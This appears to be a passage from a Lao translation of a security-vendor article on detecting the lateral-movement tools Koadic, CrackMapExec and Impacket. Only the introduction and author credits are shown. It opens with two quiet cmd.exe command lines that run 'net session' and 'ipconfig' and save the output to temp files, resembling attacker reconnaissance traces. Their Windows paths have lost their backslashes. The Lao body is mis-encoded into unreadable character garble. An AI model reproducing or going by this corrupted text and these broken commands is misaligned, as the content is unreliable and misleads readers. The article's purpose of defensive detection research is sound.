"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

เบเบฒเบ™เบ„เบปเป‰เบ™เบžเบปเบš

เบ—เปˆเบฒโ€‹เบญเปˆเบฝเบ‡โ€‹เบเบฒเบ™โ€‹เบ”เบณโ€‹เบฅเบปเบ‡โ€‹เบŠเบตโ€‹เบงเบดเบ”โ€‹เบขเบนเปˆโ€‹เบ™เบญเบโ€‹เบ”เบดเบ™โ€‹เบžเบงเบกโ€‹เป„เบ”เป‰โ€‹เบฎเบฑเบšโ€‹เบ„เบงเบฒเบกโ€‹เบ™เบดโ€‹เบเบปเบกโ€‹เบŠเบปเบกโ€‹เบŠเบญเบšโ€‹เปƒเบ™โ€‹เบšเบฑเบ™โ€‹เบ”เบฒโ€‹เบญเบฒเบ”โ€‹เบเบฒโ€‹เบเบญเบ™. เบžเบงเบเป€เบ‚เบปเบฒเปƒเบŠเป‰เป€เบ„เบทเปˆเบญเบ‡เบกเบทเปเบฅเบฐเบเบปเบ™เป„เบเบ—เบตเปˆเบชเป‰เบฒเบ‡เบ‚เบถเป‰เบ™เปƒเบ™ Windows เบชเปเบฒเบฅเบฑเบšเบ„เบงเบฒเบกเบ•เป‰เบญเบ‡เบเบฒเบ™เบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒ. เบžเบงเบเป€เบฎเบปเบฒเบเปเบฒเบฅเบฑเบ‡เป€เบซเบฑเบ™เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ—เบตเปˆเบ™เบดเบเบปเบก Koadic, CrackMapExec เปเบฅเบฐ Impacket เบ›เบฐเบ•เบดเบšเบฑเบ”เบ•เบฒเบกเบซเบผเบฑเบเบเบฒเบ™เบ™เบตเป‰เป€เบžเบตเปˆเบกเบ‚เบถเป‰เบ™เปƒเบ™เบšเบปเบ”เบฅเบฒเบเบ‡เบฒเบ™ APT. เบˆเปเบฒเบ™เบงเบ™เบ‚เบญเบ‡เบชเป‰เบญเบกเปƒเบ™ GitHub เบชเปเบฒเบฅเบฑเบšเป€เบ„เบทเปˆเบญเบ‡เบกเบทเป€เบซเบผเบปเปˆเบฒเบ™เบตเป‰เปเบกเปˆเบ™เบเบฑเบ‡เป€เบžเบตเปˆเบกเบ‚เบถเป‰เบ™, เปเบฅเบฐเบญเบฑเบ™เปƒเบซเบกเปˆเบเปเบฒเบฅเบฑเบ‡เบ›เบฐเบเบปเบ”เบ‚เบถเป‰เบ™ (เบกเบตเปเบฅเป‰เบงเบ›เบฐเบกเบฒเบ™เบซเบ™เบถเปˆเบ‡เบžเบฑเบ™เบ‚เบญเบ‡เป€เบ‚เบปเบฒเป€เบˆเบปเป‰เบฒเปƒเบ™เบ›เบฑเบ”เบˆเบธเบšเบฑเบ™). เบ—เปˆเบฒเบญเปˆเบฝเบ‡เบเบณเบฅเบฑเบ‡เป„เบ”เป‰เบฎเบฑเบšเบ„เบงเบฒเบกเบ™เบดเบเบปเบกเบญเบฑเบ™เป€เบ™เบทเปˆเบญเบ‡เบกเบฒเบˆเบฒเบเบ„เบงเบฒเบกเบฅเบฝเบšเบ‡เปˆเบฒเบเบ‚เบญเบ‡เบกเบฑเบ™: เบœเบนเป‰เป‚เบˆเบกเบ•เบตเบšเปเปˆเบ•เป‰เบญเบ‡เบเบฒเบ™เป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ‚เบญเบ‡เบžเบฒเบเบชเปˆเบงเบ™เบ—เบตเบชเบฒเบกเปเบฅเป‰เบง; เบžเบงเบเป€เบฎเบปเบฒเบชเบธเบกเปƒเบชเปˆเบเบฒเบ™เบชเบถเบเบชเบฒเบเบฒเบ™เบชเบทเปˆเบชเบฒเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบ: เปเบ•เปˆเบฅเบฐเป€เบ„เบทเปˆเบญเบ‡เบกเบทเบ—เบตเปˆเบญเบฐเบ—เบดเบšเบฒเบเบ‚เป‰เบฒเบ‡เป€เบ—เบดเบ‡เบ™เบตเป‰เบ›เปˆเบญเบเปƒเบซเป‰เบฎเปˆเบญเบ‡เบฎเบญเบเบ‚เบญเบ‡เบ•เบปเบ™เป€เบญเบ‡เปƒเบ™เบเบฒเบ™เบˆเบฐเบฅเบฒเบˆเบญเบ™เป€เบ„เบทเบญเบ‚เปˆเบฒเบ; เบเบฒเบ™เบชเบถเบเบชเบฒเบฅเบฒเบเบฅเบฐเบญเบฝเบ”เบ‚เบญเบ‡เบžเบงเบเป€เบ‚เบปเบฒเบญเบฐเบ™เบธเบเบฒเบ”เปƒเบซเป‰เบžเบงเบเป€เบฎเบปเบฒเบชเบญเบ™เบœเบฐเบฅเบดเบ”เบ•เบฐเบžเบฑเบ™เบ‚เบญเบ‡เบžเบงเบเป€เบฎเบปเบฒ เบเบฒเบ™เบ„เบปเป‰เบ™เบžเบปเบšเบเบฒเบ™เป‚เบˆเบกเบ•เบตเป€เบ„เบทเบญเบ‚เปˆเบฒเบ PT เบเบงเบ”เบžเบปเบšเบžเบงเบเบกเบฑเบ™, เป€เบŠเบดเปˆเบ‡เปƒเบ™เบ—เบตเปˆเบชเบธเบ”เบˆเบฐเบŠเปˆเบงเบเบชเบทเบšเบชเบงเบ™เบฅเบฐเบšเบปเบšเบ•เปˆเบญเบ‡เป‚เบชเป‰เบ—เบฑเบ‡เบซเบกเบปเบ”เบ‚เบญเบ‡เป€เบซเบ”เบเบฒเบ™เบ—เบฒเบ‡เบญเบดเบ™เป€เบ•เบตเป€เบ™เบฑเบ”เบ—เบตเปˆเบเปˆเบฝเบงเบ‚เป‰เบญเบ‡เบเบฑเบšเบžเบงเบเป€เบ‚เบปเบฒ.

เบœเบนเป‰เบ‚เบฝเบ™:

  • Anton Tyurin, เบซเบปเบงเบซเบ™เป‰เบฒเบžเบฐเปเบ™เบเบšเปเบฅเบดเบเบฒเบ™เบœเบนเป‰เบŠเปˆเบฝเบงเบŠเบฒเบ™, PT Expert Security Center, เป€เบ•เบฑเบเป‚เบ™เป‚เบฅเบขเบตเปƒเบ™เบ—เบฒเบ‡เบšเบงเบ
  • Egor Podmokov, เบœเบนเป‰เบŠเปˆเบฝเบงเบŠเบฒเบ™, เบชเบนเบ™เบ„เบงเบฒเบกเบ›เบญเบ”เป„เบžเบœเบนเป‰เบŠเปˆเบฝเบงเบŠเบฒเบ™ PT, เป€เบ•เบฑเบเป‚เบ™เป‚เบฅเบขเบตเปƒเบ™เบ—เบฒเบ‡เบšเบงเบ

เปเบซเบผเปˆเบ‡เบ‚เปเป‰เบกเบนเบ™: www.habr.com

เป€เบžเบตเปˆเบกเบ„เบงเบฒเบกเบ„เบดเบ”เป€เบซเบฑเบ™